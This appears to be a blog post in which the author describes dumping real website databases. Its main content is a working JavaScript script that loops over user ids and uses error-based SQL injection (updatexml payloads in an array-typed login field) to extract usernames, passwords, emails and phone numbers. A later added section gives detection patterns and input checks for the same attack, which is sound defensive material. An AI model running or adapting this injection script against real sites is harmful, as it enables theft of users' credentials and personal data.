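[MySQL] A Real-World Database Dump Attack
Today I really did dump a few databases, and I fully automated the recording of the data.
A single website can leak the information of hundreds or even thousands of users, so now you know where the so-called social-engineering databases come from: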
var bb=0;
var logs = "";
for(i=1;i<400;i){
    var username=new Array();
    username[0] = "exp";
    bb++;
    switch(bb){
        case 1:
            username[1] = "-1 or updatexml(0,concat(0xa,(select concat("+i+",'+',username) from nqx_ucenter_member where id="+i+")),0)";
            break;
        case 2:
            username[1] = "-1 or updatexml(0,concat(0xa,(select concat("+i+",'+',password) from nqx_ucenter_member where id="+i+")),0)";
            break;
        case 3:
            username[1] = "-1 or updatexml(0,concat(0xa,(select concat("+i+",'+',email) from nqx_ucenter_member where id="+i+")),0)";
            break;
        case 4:
            username[1] = "-1 or updatexml(0,concat(0xa,(select concat("+i+",'+',mobile) from nqx_ucenter_member where id="+i+")),0)";
            bb=0;
            i++;
            break;
    }
    password = 1;
    var data = {
        username: username,
        password:password
    };
    $.ajax({
        type: 'POST',
        url: '',
        data:data,
        success: (function(){}),
        error:(function(ele){
            tmp = ele.responseText.match(/XPATH syntax error: '([^<]*)<\/h1>/g)[0].split('+');
            tmp = tmp[1].split("'<");
            tmp = tmp[0];
            logs += tmp+",";
            if(bb==0){
                logs += "\n\r";
                console.log(logs);
                logs = "";
            }
        }),
        async:false
    });
}
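From the defender's side, the script above leaves three signals in traffic: login fields sent as arrays (username[0], username[1]), updatexml( inside a parameter value, and the database's "XPATH syntax error" text echoed in the response. The following is an added example, not code from the original post; the function names and the sample log entries are constructed for illustration.

```javascript
// Added defensive example; names and sample traffic are constructed.
const SQL_ERROR_FUNCS = /\b(updatexml|extractvalue)\s*\(/i;
const LEAKED_DB_ERROR = /XPATH syntax error/i;

// Inspect one logged exchange: url-encoded POST body plus response body.
function inspectExchange(requestBody, responseBody) {
  const findings = [];
  for (const [key, value] of new URLSearchParams(requestBody)) {
    // username[0]=..., username[1]=... means a login field arrived as an array.
    const m = key.match(/^(username|password)\[[^\]]*\]$/);
    if (m) findings.push(`array-typed ${m[1]}`);
    if (SQL_ERROR_FUNCS.test(value)) findings.push(`sql-function in ${key}`);
  }
  if (LEAKED_DB_ERROR.test(responseBody)) findings.push("db-error leaked in response");
  return [...new Set(findings)]; // de-duplicate repeated findings
}

// Server-side guard: login fields must be plain strings of sane length.
function isValidLogin(body) {
  return ["username", "password"].every(
    (f) => typeof body[f] === "string" && body[f].length > 0 && body[f].length <= 64
  );
}

// Constructed sample log entries (not captured from any real site).
const SAMPLES = [
  { req: "username=alice&password=s3cret", res: "<h1>Login failed</h1>" },
  {
    req: "username%5B0%5D=exp&username%5B1%5D=-1+or+updatexml(0%2Cconcat(0xa%2C(select+1))%2C0)&password=1",
    res: "<h1>XPATH syntax error: '\n1'</h1>",
  },
];

// Returns one findings array per sample, in order.
function scan(samples) {
  return samples.map((s) => inspectExchange(s.req, s.res));
}

console.log(scan(SAMPLES));
```

Rejecting non-string login fields and returning a generic error page instead of the database message removes the channel the script reads from.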
Tags: MySQL
2017-02-23 22:30